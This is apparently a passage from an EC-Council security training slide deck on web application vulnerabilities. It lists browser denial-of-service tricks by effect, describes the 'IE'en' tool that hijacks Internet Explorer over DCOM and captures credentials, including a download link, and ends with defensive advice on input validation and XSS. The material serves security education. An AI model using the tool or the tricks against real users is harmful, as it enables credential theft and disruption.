These can be such as the ones seen include:
Deadly image A .GIF which crashes the browser on clicking.
Uncloseable window Opens a document that utilizes the JavaScript Unload event handler
to reopen the document if you try to leave or close the window.
Invincible alert dialogue Executes a function which generates an alert dialogue and then runs
the function again
Reload-o-rama Refreshes the document from the history 1000 times/second,
leaving the back and stop buttons useless.
Window spawner Continuously opens new windows until the ram or swap space is full.
Jiggy window Causes the window to dance around on the screen so fast that the
controls cannot be reached.
Jiggy window spawner Creates and endless stream of little dancing windows.

While loop processor
hog
executes an endless loop to chew up some processor time
Recursive frames Opens a set of recursive frames until the ram or swap space is full.
Memory bomb Dynamically allocates ram to the browser until the ram or swap
space is full.
Super memory bomb Opens a 100K document with numerous recursive tables and
ordered lists.

EC-Council
Hacking Tool: IEEN
http://www.securityfriday.com/ToolDownload/IEen
IEEN remotely controls Internet Explorer using DCOM.
Ifyou knew the account name and the password of a remote machine,
you can remotely control the software component on it using DCOM. For
example Internet Explorer is one of the soft wares that can be controlled.
IEEN: The Distributed Component Object Model (DCOM) is a protocol that enables software
components to communicate directly over a network in a reliable, secure, and efficient manner.
DCOM is installed on most Windows machines by default and runs without noticed by the users.
However, if an attacker knew the account name and the password of a remote machine, he can
remotely control the software component on it using DCOM. For example, Internet Explorer is
one of the software components that can be controlled. IE'en is a tool that can be used to remotely
control Internet Explorer using DCOM.

Summary of IE'en Functionalities:
• Remotely connects to or activates Internet Explorer
• Captures data sent and received using Internet Explorer
• Even on SSL encrypted websites (e.g. Hotmail), IE'en can capture user ID and password
in plain text.
• Change the web page on the remote IE window.
• Make the remote IE window visible / invisible

EC-Council
Summary
Attacking web applications is the easiest way to compromise hosts,
networks and users.
Generally nobody notices web application penetration, until
serious damage has been done.
Web application vulnerability can be eliminated to a great extent
ensuring proper design specifications and coding practices as well
as implementing common security procedures.
Various tools help the attacker to view the source codes and scan
for security holes.
The first rule in web application development from a security
standpoint is not to rely on the client side data for critical
processes. Using an encrypted session such as SSL / “secure”
cookies are advocated instead of using hidden fields, which are
easily manipulated by attackers.
A cross-site scripting vulnerability is caused by the failure of a web
based application to validate user supplied input before returning
it to the client system.
If the application accepts only expected input, then the XSS can be
significantly reduced.
Summary
Recap
• Attacking web applications is the easiest way to compromise hosts, networks and users.
• Generally nobody notices web application penetration, until serious damage has been
done.
• Web application vulnerability can be eliminated to a great extent ensuring proper design
specifications and coding practices as well as implementing common security procedures.
• Various tools help the attacker to view the source codes and scan for security holes.
• The first rule in web application development from a security standpoint is not to rely on
the client side data for critical processes. Using an encrypted session such as SSL /
“secure” cookies are advocated instead of using hidden fields, which are easily
manipulated by attackers.
• A cross-site scripting vulnerability is caused by the failure of a web based application to
validate user supplied input before returning it to the client system.
• If the application accepts only expected input, then the XSS can be significantly reduced.

Module 12 (web application vulnerabilities)

Recommended

Recommended

More Related Content

What's hot

What's hot (19)

Similar to Module 12 (web application vulnerabilities)

Similar to Module 12 (web application vulnerabilities) (20)

More from Wail Hassan

More from Wail Hassan (20)

Recently uploaded

Recently uploaded (20)

Module 12 (web application vulnerabilities)